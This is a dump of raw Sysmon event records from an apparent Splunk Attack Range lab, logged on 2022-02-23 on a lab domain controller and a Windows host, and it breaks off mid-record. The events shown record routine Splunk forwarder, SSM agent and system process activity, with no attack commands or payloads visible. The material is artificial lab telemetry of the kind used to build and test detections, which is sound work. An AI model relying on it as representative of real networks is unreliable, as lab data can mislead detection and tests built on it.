10:53:48.649{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51377-false10.0.1.12-8000- 23542300x8000000000000000217212Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:51.033{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=574D2382F507EB2EEAC9556FE5B7E918,SHA256=7DBDDE4D6A2D22E8280BBCCBDDAF4AA28194636E0D98117C93272402EF894FD1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289296Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:52.770{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5017C6FE7786C4AC547771C732B9D36,SHA256=927A094871746D56752EE11762FBF5F41CF899B0973063FA8A02888648605BC2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217228Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:52.423{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ED86821AA221A23987EB8CF5551B7ACA,SHA256=29C92BC85219B2BAA88B15CE47D7128445BA9031C53375E7A8CAF18AFD9996D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217227Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:52.267{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63AC7CDAC6622EA6FA0D1696504030F3,SHA256=BF5F49948C2DDFA2B68F42CC35B31A472474601F6A615606E0E282BDAA489EAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289297Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:53.801{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C88753D90DB688103E1113042EDA3D0,SHA256=EE4CBA12651C247683F3C8305AB89F253796B9134096A75AAFA877B987FA55EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217229Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:53.330{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3C2B31400B0BA5677BAB88D8A6EDBA0,SHA256=643AC92ECCFB0E6E9CC4FA388BCE9253E90A2525C5811C04D62341141BD1D3A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289299Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:54.801{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC83B05E7E5BE05A6C499F1CB0D6DA66,SHA256=6DCC9FB5F8674BD62B62058F721682FF044BAEAF2F1C67E47FB36CEE0EA65816,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217230Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:54.345{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B74B0DF64041E05A40ADC71CCEAA1EE0,SHA256=4655480F940F889E50ABA525CE613A4E3929745C232E89FC7C131C24D90CEAB3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000289298Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:51.672{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53523-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000289300Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:55.817{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74109FEBBCA3D018423FAB56828A8E58,SHA256=FBDFF90BE824827507E75915AF57F70C255E31CAC4AFBAF2F5D613F0B31EA895,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217231Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:55.345{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30883CC21CA429BBC1915487B4EC8D52,SHA256=5D9F6A4288BDAF45C3BB3B342F35A210DE8F5F0AAA35E36AA8FDEA3F76E20045,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289301Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:56.851{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=686AF5D6427D7E16DB8C5D701F64A7B3,SHA256=377FD2A825095A97270490A1054EC650280EA5A6D2CCBC718D92153C664C5F52,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217233Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:54.649{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51378-false10.0.1.12-8000- 23542300x8000000000000000217232Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:56.377{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F283928A9573D47A3A9C48AC2377F7C3,SHA256=BBD188D38D6B2781AAE4EAEB3CAD8637EC6E13D9320C88E3FDB065C863D207B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289302Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:57.870{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75C8E7526159FBCADA5B46046A6B1B8F,SHA256=710F4AEC19E8D8DBACFC9E8402A970837F62336A3CFFEE65F21FE3D6754857B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217234Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:57.392{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0B0DBA243BEDE93BF4D4965F5FFBCB1,SHA256=0005D28F1E05AFDE7607CA14FDF0E3A586754148FE0F57B2B8F16E9F14E4B93F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289303Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:58.885{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5576B221D4E4CC841BA7A06080A5F1A9,SHA256=D05668C1A8B55F3B3D23B8CB3AD74D3C3FEB2168486F94C1BA7883EC9CE9CF9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217235Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:58.392{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BB2F947D25F1FDDF8BC2A9C5B7A2AEF,SHA256=A161B6B5BF4B48407B985A9A7791FADD94BE634D45A6FFC200B4090963BEE660,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289304Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:59.916{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A39946F10DD3A676E3C50EC4C81B1D5,SHA256=E2AC3247FA14172E5E33EABF9ED6E6380AF091418C326634D2E41C5A5053285B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217236Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:59.392{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB8A790617454B3525373714293ECA2B,SHA256=CAD9D5557344B9192977EB25FE05338C10C8E4DCFBB2FCA06E1CF83BA6321EBA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289306Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:00.922{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F41ACB496D1519125D94141A3A2BB5D,SHA256=5359445C89A3573F956CAD99D941D03BB927481DBCE59EFF8F41961B4CC90427,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217237Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:00.424{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FC2B1D659646F70964D496BD7F8F59C,SHA256=4005F550E31EF26C38AD4B8DCD10FB18609BDFB1C171B8A41049011A1E2B93C9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000289305Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:57.606{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53524-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000289315Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:01.991{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C494434D8FE08F2C4D93934EF2266AD,SHA256=127C792BC414379FCE4577771C56B4ACDD0AF4D0222324C5E372BE8FD1D2F8CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217238Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:01.642{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E879C350958E377C5C23CF18A2ADCA66,SHA256=D9A476A6D039110FDD260755B8C82BDA4A677AFEE3059A6E23023AA1ABB81075,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289314Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:01.406{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1249-6216-3205-000000003802}6876C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289313Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:01.390{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289312Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:01.390{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289311Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:01.390{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289310Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:01.390{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289309Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:01.390{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-1249-6216-3205-000000003802}6876C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000289308Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:01.390{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1249-6216-3205-000000003802}6876C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000289307Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:01.392{C8EA50B7-1249-6216-3205-000000003802}6876C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000217240Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:02.839{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-137MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217239Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:02.650{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE43D5216147A6B2CF8F5F983F2659E0,SHA256=17044C5F7F72D392EDC45D5A820C72CC8136138E493D989A02CFA95DF952A2EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289324Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:02.194{C8EA50B7-1249-6216-3205-000000003802}68766884C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289323Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:02.072{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-124A-6216-3305-000000003802}6476C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289322Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:02.067{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289321Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:02.067{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289320Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 